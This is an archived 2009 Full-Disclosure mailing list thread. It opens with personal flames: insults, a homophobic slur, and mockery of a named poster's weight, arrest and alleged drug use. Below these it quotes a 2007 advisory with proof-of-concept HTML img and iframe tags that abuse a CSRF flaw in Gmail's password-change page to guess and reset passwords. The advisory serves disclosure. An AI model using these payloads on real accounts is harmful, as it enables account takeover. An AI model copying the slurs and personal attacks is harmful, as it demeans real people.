lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 04 Mar 2009 20:06:39 -0500
From: bobby.mugabe@...hmail.com
To: security.mustache@...il.com
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Apple Safari ... DoS Vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

'stache,

Perhaps his current lack of methamphetamines is the cause of his
extra girth.

Mr. Starks, I suggest immediately going off the low-reward, mass-
marketed and overpriced muscle muscle milk and doing a bit of
cardiovascular exercise until you've lost some of that fat, fatass.

- -bm

On Wed, 04 Mar 2009 19:59:41 -0500 Valdis' Mustache
<security.mustache@...il.com> wrote:
>Rob,
>
>Our young scholar does nonetheless have some sage advice for young
>ladies of
>colour.
>
>http://www.helium.com/items/250130-advice-to-black-females
>
>I was rather alarmed at his arrest and methamphetamine abuse,
>however one
>might presume that his recent weight training is part of a
>rehabilitation
>regimen.
>
>http://www.coloradoan.com/article/20090117/NEWS01/901170316/1002/
>
>
>Your humble servant,
>Усы из Валдис
>
>
>On Wed, Mar 4, 2009 at 6:44 PM,  <bobby.mugabe@...hmail.com>
>wrote:
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> Mr. Stark,
>>
>> You're body fat seems to be fairly high, you should consider a
>> cutting phase and quitting the muscle milk and whatever cheap
>> steroids you use.  Your looking like a fat dumb homosexual in
>those
>> tights.  Someone with you're levels of insecurity shouldn't be
>in
>> computer security.
>>
>> - -bm
>>
>> On Wed, 04 Mar 2009 16:44:50 -0500 Jason Starks
>> <jstarks440@...il.com> wrote:
>>>Ah, probably not. Your stringing together words to make
>sentences
>>>is what
>>>I'll regret reading. I'll continue to use my muscle milk and
>>>you'll continue
>>>to work your 9-5. The world turns once again!
>>>
>>>On Wed, Mar 4, 2009 at 4:06 PM, Valdis' Mustache <
>>>security.mustache@...il.com> wrote:
>>>
>>>> Mister Snarks,
>>>>
>>>> I've never been anything but who I purport to be, the humble
>>>upper
>>>> facial hair quadrant of a loquacious sysadmin. Low of birth,
>>>though
>>>> noble in aspiration, a student of history and of the many
>>>mustaches
>>>> who came before myself.
>>>>
>>>> You, young scholar, should be wary, though! Prospective
>>>employers do
>>>> make regular use of search engines, "googling" potential
>>>candidates to
>>>> gain insight into possible character flaws!
>>>>
>>>> True, your clean and jerk abilities as archived on the YouTube
>>>are
>>>> admirable, but acting a fool on security lists is something
>>>normally
>>>> reserved only for those in academia, who are markedly
>difficult
>>>if not
>>>> impossible to unseat from their comfortable chairs, as
>>>indisputably
>>>> underscored by the e-antics of this mutache's owner, and, of
>>>course,
>>>> Mssr. Schmehl.
>>>>
>>>> You'll come to regret your lack of anonymity, as your posts
>will
>>>live
>>>> on for eternity, much as I've came to regret my unfortunate
>>>> association with the unruly beardlike growth connecting to me
>>>from the
>>>> south, and my unavoidable tenuous connection with those
>>>objectionable
>>>> and uncouth sideburns.
>>>>
>>>>
>>>> Your humble servant,
>>>> I baffi di Valdis
>>>>
>>>> On Wed, Mar 4, 2009 at 12:55 PM, Jason Starks
>>><jstarks440@...il.com>
>>>> wrote:
>>>> > I know, its insane. It is a new trend, though, just like
>>>people
>>>> registering
>>>> > gmail accounts just to flame and troll on FD!
>>>> >
>>>> > Its like, your credability like, goes like, ok you start
>like
>>>at 0, and
>>>> then
>>>> > like, it goes like to -1, and like, then even lower like.
>>>> >
>>>> > Absolutely genius.
>>>> >
>>>> > x0x0x0x0x0x0x0x0x0x
>>>> >
>>>> > On Tue, Mar 3, 2009 at 6:28 PM, Biz Marqee
>>><biz.marqee@...il.com> wrote:
>>>> >>
>>>> >> This was 2 years well spent... NOT!
>>>> >>
>>>> >> Seriously what is with all these people popping up
>releasing
>>>advisories
>>>> >> that are absolute SHIT? Is it to try and get jobs or what?
>>>> >>
>>>> >>
>>>> >> On Tue, Mar 3, 2009 at :55 AM, ISecAuditors Security
>>>Advisories <
>>>> >> advisories at isecauditors.com> wrote:
>>>> >>
>>>> >> > =============================================
>>>> >> > INTERNET SECURITY AUDITORS ALERT 2007-003
>>>> >> > - Original release date: August 1st, 2007
>>>> >> > - Last revised: January 11th, 2009
>>>> >> > - Discovered by: Vicente Aguilera Diaz
>>>> >> > - Severity: 3/5
>>>> >> > =============================================
>>>> >> >
>>>> >> > I. VULNERABILITY
>>>> >> > -------------------------
>>>> >> > CSRF vulnerability in GMail service
>>>> >> >
>>>> >> > II. BACKGROUND
>>>> >> > -------------------------
>>>> >> > Gmail is Google's free webmail service. It comes with
>built-
>>>in Google
>>>> >> > search technology and over 2,600 megabytes of storage
>(and
>>>growing
>>>> >> > every day). You can keep all your important messages,
>files
>>>and
>>>> >> > pictures forever, use search to quickly and easily find
>>>anything
>>>> >> > you're looking for, and make sense of it all with a new
>way
>>>of viewing
>>>> >> > messages as part of conversations.
>>>> >> >
>>>> >> > III. DESCRIPTION
>>>> >> > -------------------------
>>>> >> > Cross-Site Request Forgery, also known as one click
>attack
>>>or session
>>>> >> > riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a
>>>kind of
>>>> >> > malicious exploit of websites. Although this type of
>attack
>>>has
>>>> >> > similarities to cross-site scripting (XSS), cross-site
>>>scripting
>>>> >> > requires the attacker to inject unauthorized code into a
>>>website,
>>>> >> > while cross-site request forgery merely transmits
>>>unauthorized
>>>> >> > commands from a user the website trusts.
>>>> >> >
>>>> >> > GMail is vulnerable to CSRF attacks in the "Change
>>>Password"
>>>> >> > functionality. The only token for authenticate the user
>is
>>>a session
>>>> >> > cookie, and this cookie is sent automatically by the
>>>browser in every
>>>> >> > request.
>>>> >> >
>>>> >> > An attacker can create a page that includes requests to
>the
>>>"Change
>>>> >> > password" functionality of GMail and modify the passwords
>>>of the users
>>>> >> > who, being authenticated, visit the page of the attacker.
>>>> >> >
>>>> >> > The attack is facilitated since the "Change Password"
>>>request can be
>>>> >> > realized across the HTTP GET method instead of the POST
>>>method that is
>>>> >> > realized habitually across the "Change Password" form.
>>>> >> >
>>>> >> > IV. PROOF OF CONCEPT
>>>> >> > -------------------------
>>>> >> > 1. An attacker create a web page "csrf-attack.html" that
>>>realize many
>>>> >> > HTTP GET requests to the "Change Password" functionality.
>>>> >> >
>>>> >> > For example, a password cracking of 3 attempts (see
>>>"OldPasswd"
>>>> >> > parameter):
>>>> >> > ...
>>>> >> > <img
>>>> >> > src="
>>>> >> >
>>>> >> >
>>>>
>>>https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&g
>ro
>>>up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc12
>3&
>>>p=&save=Save
>>>> >> > ">
>>>> >> > <img
>>>> >> > src="
>>>> >> >
>>>> >> >
>>>>
>>>https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&g
>ro
>>>up1=OldPasswd&OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc12
>3&
>>>p=&save=Save
>>>> >> > ">
>>>> >> > <img
>>>> >> > src="
>>>> >> >
>>>> >> >
>>>>
>>>https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&g
>ro
>>>up1=OldPasswd&OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc12
>3&
>>>p=&save=Save
>>>> >> > ">
>>>> >> > ...
>>>> >> >
>>>> >> > or with hidden frames:
>>>> >> > ...
>>>> >> > <iframe
>>>> >> > src="
>>>> >> >
>>>> >> >
>>>>
>>>https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&g
>ro
>>>up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc12
>3&
>>>p=&save=Save
>>>> >> > ">
>>>> >> > <iframe
>>>> >> > src="
>>>> >> >
>>>> >> >
>>>>
>>>https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&g
>ro
>>>up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc12
>3&
>>>p=&save=Save
>>>> >> > ">
>>>> >> > <iframe
>>>> >> > src="
>>>> >> >
>>>> >> >
>>>>
>>>https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&g
>ro
>>>up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc12
>3&
>>>p=&save=Save
>>>> >> > ">
>>>> >> > ...
>>>> >> >
>>>> >> > The attacker can use deliberately a weak new password
>(see
>>>"Passwd"
>>>> >> > and "PasswdAgain" parameters), this way he can know if
>the
>>>analysed
>>>> >> > password is correct without need to modify the password
>of
>>>the victim
>>>> >> > user.
>>>> >> >
>>>> >> > Using weak passwords the "Change Password" response is:
>>>> >> >  - " The password you gave is incorrect. ", if the
>analysed
>>>password
>>>> >> > is not correct.
>>>> >> >  - " We're sorry, but you've selected an insecure
>password.
>>>In order
>>>> >> > to protect the security of your account, please click
>>>"Password
>>>> >> > Strength" to get tips on choosing to safer password. ",
>if
>>>the
>>>> >> > analysed password is correct and the victim password is
>not
>>>modified.
>>>> >> >
>>>> >> > If the attacker want to modify the password of the victim
>>>user, the
>>>> >> > waited response message is: " Your new password has been
>>>saved - OK ".
>>>> >> >
>>>> >> > In any case, the attacker evades the restrictions imposed
>>>by the
>>>> >> > captcha of the authentication form.
>>>> >> >
>>>> >> > 2. A user authenticated in GMail visit the "csrf-
>>>attack.html" page
>>>> >> > controlled by the attacker.
>>>> >> >
>>>> >> > For example, the attacker sends a mail to the victim (a
>>>GMail account)
>>>> >> > and provokes that the victim visits his page (social
>>>engineering). So,
>>>> >> > the attacker insures himself that the victim is
>>>authenticated.
>>>> >> >
>>>> >> > 3. The password cracking is executed transparently to the
>>>victim.
>>>> >> >
>>>> >> > V. BUSINESS IMPACT
>>>> >> > -------------------------
>>>> >> > - Selective DoS on users of the GMail service (changing
>>>user
>>>> password).
>>>> >> > - Possible access to the mail of other GMail users.
>>>> >> >
>>>> >> > VI. SYSTEMS AFFECTED
>>>> >> > -------------------------
>>>> >> > Gmail service.
>>>> >> >
>>>> >> > VII. SOLUTION
>>>> >> > -------------------------
>>>> >> > No solution provided by vendor.
>>>> >> >
>>>> >> > VIII. REFERENCES
>>>> >> > -------------------------
>>>> >> > http://www.gmail.com
>>>> >> >
>>>> >> > IX. CREDITS
>>>> >> > -------------------------
>>>> >> > This vulnerability has been discovered and reported by
>>>> >> > Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot)
>>>com).
>>>> >> >
>>>> >> > X. REVISION HISTORY
>>>> >> > -------------------------
>>>> >> > July      31, 2007: Initial release
>>>> >> > August     1, 2007: Fewer corrections.
>>>> >> > December  30, 2008: Last details.
>>>> >> >
>>>> >> > XI. DISCLOSURE TIMELINE
>>>> >> > -------------------------
>>>> >> > July      30, 2007: Vulnerability acquired by
>>>> >> >                    Internet Security Auditors.
>>>> >> > August     1, 2007: Initial notification sent to the
>>>> >> >                    Google security team.
>>>> >> > August     1, 2007: Google security team request
>additional
>>>> >> >                    information.
>>>> >> >                    about and start review the
>>>vulnerability.
>>>> >> > August    13, 2007: Request information about the status.
>>>> >> > August    15, 2007: Google security team responds that
>they
>>>are still
>>>> >> >                    working on this.
>>>> >> > September 19, 2007: Request for the status. No response.
>>>> >> > November  26, 2007: Request for the status. No response.
>>>> >> > January    2, 2008: Request for the status. No response.
>>>> >> > January    4, 2008: Request for the status. No response.
>>>> >> > January   11, 2008: Request for the status. No response.
>>>> >> > January   15, 2008: Request for the status. Automated
>>>response.
>>>> >> > January   18, 2008: Google security team informs that
>don't
>>>expect
>>>> >> >                    behaviour to change in the short term
>>>giving
>>>> >> >                    the justification.
>>>> >> >                    We deconstruct those arguments as
>>>insufficient.
>>>> >> >                    No more responses.
>>>> >> > December  30, 2008: Request for the status. Confirmation
>>>from Google
>>>> >> >                    they won't change the consideration
>>>about this.
>>>> >> > January   11, 2009: Publication to Bugtraq. Rejected
>twice.
>>>> >> >                    No reasons.
>>>> >> > March     03, 2009: General publication for disclosure in
>>>other lists.
>>>> >> >
>>>> >> > XII. LEGAL NOTICES
>>>> >> > -------------------------
>>>> >> > The information contained within this advisory is
>supplied
>>>"as-is"
>>>> >> > with no warranties or guarantees of fitness of use or
>>>otherwise.
>>>> >> > Internet Security Auditors accepts no responsibility for
>>>any damage
>>>> >> > caused by the use or misuse of this information.
>>>> >> >
>>>> >> > _______________________________________________
>>>> >> > Full-Disclosure - We believe in it.
>>>> >> > Charter: http://lists.grok.org.uk/full-disclosure-
>>>charter.html
>>>> >> > Hosted and sponsored by Secunia - http://secunia.com/
>>>> >> >
>>>> >>
>>>> >> _______________________________________________
>>>> >> Full-Disclosure - We believe in it.
>>>> >> Charter: http://lists.grok.org.uk/full-disclosure-
>>>charter.html
>>>> >> Hosted and sponsored by Secunia - http://secunia.com/
>>>> >
>>>> >
>>>> > _______________________________________________
>>>> > Full-Disclosure - We believe in it.
>>>> > Charter: http://lists.grok.org.uk/full-disclosure-
>charter.html
>>>> > Hosted and sponsored by Secunia - http://secunia.com/
>>>> >
>>>>
>> -----BEGIN PGP SIGNATURE-----
>> Charset: UTF8
>> Version: Hush 3.0
>> Note: This signature can be verified at
>https://www.hushtools.com/verify
>>
>>
>wpwEAQMCAAYFAkmvIAQACgkQhNp8gzZx3sifPQP/Z/JwoxHfL+/YWIumE6ohkDzHigc
>M
>>
>FFMGnJtPy1PUYahP2Kkq4oBUiFgNsqWsBjvNnp+hrILgO6w73OasuLZQSvYX7hCMK8k
>1
>>
>eK7r0H5fjSlqoRhkJSGhgBDL4H7q1nMrkr0x4zGO7Jeeeq8DuU23x2A1UvnJCE+RAo6
>5
>> vFaHNwE=
>> =uYwk
>> -----END PGP SIGNATURE-----
>>
>> --
>> Click to find information on your credit score and your credit
>report.
>>
>http://tagline.hushmail.com/fc/BLSrjkqeNwyn7W35g2EhsFTPSKje8aswj4QT
>ZvrXUmflUijsGrXajBFpRZG/
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkmvJVcACgkQhNp8gzZx3siNoAP/TSO6qJuQJQtmYHF07iGl8er0PaWH
Ex1h8pgn5VsRfLR8csI1u5wO7KaUfB3xOyVDhhXecDqjqlleVg/tmipFSYdxMrGQ9M/S
nPfw6hbOmRNHeq4Eb4YPtom3TDqQL/UCNZ3TQqX0Cs596qwWq6L3xAKIYFUF0YQU75ww
/WW0y/k=
=u4xa
-----END PGP SIGNATURE-----

--
Click to get your online credit check report &amp; score.
 http://tagline.hushmail.com/fc/BLSrjkqeMi6a6MD4j780sX3er6QPy2RyA1vqHrpNmPLz9Ty6hgD1SQwVDKw/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ